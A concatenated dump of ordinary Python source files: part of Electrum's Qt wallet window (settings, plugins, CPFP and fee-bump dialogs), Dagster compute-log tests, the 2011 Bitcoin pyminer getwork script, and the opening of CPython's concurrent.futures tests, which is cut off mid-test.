tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = bool(self.config.get('confirmed_only', False))
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = bool(self.config.get('coin_chooser_output_rounding', False))
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
test_stdout.py | from __future__ import print_function
import os
import random
import string
import sys
import time
import pytest
from dagster import (
DagsterEventType,
InputDefinition,
ModeDefinition,
execute_pipeline,
pipeline,
reconstructable,
resource,
solid,
)
from dagster.core.execution.compute_logs import should_disable_io_stream_redirect
from dagster.core.instance import DagsterInstance
from dagster.core.storage.compute_log_manager import ComputeIOType
from dagster.core.test_utils import create_run_for_test
from dagster.seven import multiprocessing
HELLO_SOLID = "HELLO SOLID"
HELLO_RESOURCE = "HELLO RESOURCE"
SEPARATOR = os.linesep if (os.name == "nt" and sys.version_info < (3,)) else "\n"
@resource
def resource_a(_):
print(HELLO_RESOURCE)
return "A"
@solid
def spawn(_):
return 1
@solid(input_defs=[InputDefinition("num", int)], required_resource_keys={"a"})
def spew(_, num):
print(HELLO_SOLID)
return num
def define_pipeline():
@pipeline(mode_defs=[ModeDefinition(resource_defs={"a": resource_a})])
def spew_pipeline():
spew(spew(spawn()))
return spew_pipeline
def normalize_file_content(s):
return "\n".join([line for line in s.replace(os.linesep, "\n").split("\n") if line])
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk():
spew_pipeline = define_pipeline()
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith("spawn"):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, "r") as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk_multiprocess():
spew_pipeline = reconstructable(define_pipeline)
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
result = execute_pipeline(
spew_pipeline,
run_config={"storage": {"filesystem": {}}, "execution": {"multiprocess": {}}},
instance=instance,
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith("spawn"):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, "r") as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager():
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
spew_pipeline = define_pipeline()
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 3
step_key = "spew.compute"
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
stderr = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDERR)
cleaned_logs = stderr.data.replace("\x1b[34m", "").replace("\x1b[0m", "")
assert "dagster - DEBUG - spew_pipeline - " in cleaned_logs
bad_logs = manager.read_logs_file("not_a_run_id", step_key, ComputeIOType.STDOUT)
assert bad_logs.data is None
assert not manager.is_watch_completed("not_a_run_id", step_key)
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager_subscriptions():
instance = DagsterInstance.local_temp()
spew_pipeline = define_pipeline()
step_key = "spew.compute"
result = execute_pipeline(spew_pipeline, instance=instance)
stdout_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDOUT
)
stderr_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDERR
)
stdout = []
stdout_observable.subscribe(stdout.append)
stderr = []
stderr_observable.subscribe(stderr.append)
assert len(stdout) == 1
assert stdout[0].data.startswith(HELLO_SOLID)
assert stdout[0].cursor in [12, 13]
assert len(stderr) == 1
assert stderr[0].cursor == len(stderr[0].data)
assert stderr[0].cursor > 400
def gen_solid_name(length):
return "".join(random.choice(string.ascii_lowercase) for x in range(length))
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_long_solid_names():
solid_name = gen_solid_name(300)
@pipeline(mode_defs=[ModeDefinition(resource_defs={"a": resource_a})])
def long_pipeline():
spew.alias(name=solid_name)()
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
result = execute_pipeline(
long_pipeline,
instance=instance,
run_config={"solids": {solid_name: {"inputs": {"num": 1}}}},
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 1
step_key = compute_steps[0]
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
def execute_inner(step_key, pipeline_run, instance_ref):
instance = DagsterInstance.from_ref(instance_ref)
inner_step(instance, pipeline_run, step_key)
def inner_step(instance, pipeline_run, step_key):
with instance.compute_log_manager.watch(pipeline_run, step_key=step_key):
time.sleep(0.1)
print(step_key, "inner 1")
print(step_key, "inner 2")
print(step_key, "inner 3")
time.sleep(0.1)
def expected_inner_output(step_key):
return "\n".join(
["{step_key} inner {num}".format(step_key=step_key, num=i + 1) for i in range(3)]
)
def expected_outer_prefix():
return "\n".join(["outer {num}".format(num=i + 1) for i in range(3)])
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_single():
instance = DagsterInstance.local_temp()
pipeline_name = "foo_pipeline"
pipeline_run = create_run_for_test(instance, pipeline_name=pipeline_name)
step_keys = ["A", "B", "C"]
with instance.compute_log_manager.watch(pipeline_run):
print("outer 1")
print("outer 2")
print("outer 3")
for step_key in step_keys:
inner_step(instance, pipeline_run, step_key)
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_multi():
instance = DagsterInstance.local_temp()
pipeline_name = "foo_pipeline"
pipeline_run = create_run_for_test(instance, pipeline_name=pipeline_name)
step_keys = ["A", "B", "C"]
with instance.compute_log_manager.watch(pipeline_run):
print("outer 1") # pylint: disable=print-call
print("outer 2") # pylint: disable=print-call
print("outer 3") # pylint: disable=print-call
for step_key in step_keys:
process = multiprocessing.Process(
target=execute_inner, args=(step_key, pipeline_run, instance.get_ref())
)
process.start()
process.join()
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
# The way that the multiprocess compute-logging interacts with pytest (which stubs out the
# sys.stdout fileno) makes this difficult to test. The pytest-captured stdout only captures
# the stdout from the outer process, not also the inner process
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 10820
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_concurrent_futures.py | import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more revelant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
test.support.import_module('threading')
from test.support.script_helper import assert_python_ok
import os
import sys
import threading
import time
import unittest
import weakref
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future)
from concurrent.futures.process import BrokenProcessPool
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
def mul(x, y):
return x * y
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
class MyObject(object):
def my_method(self):
pass
class ExecutorMixin:
worker_count = 5
def setUp(self):
self.t1 = time.time()
try:
self.executor = self.executor_type(max_workers=self.worker_count)
except NotImplementedError as e:
self.skipTest(str(e))
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
dt = time.time() - self.t1
if test.support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 60, "synchronization issue: test lasted too long")
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
t = {executor_type}(5)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, unittest.TestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._threads), 3)
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
t.join()
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
# We don't particularly care what the default name is, just that
# it has a default name implying that it is a ThreadPoolExecutor
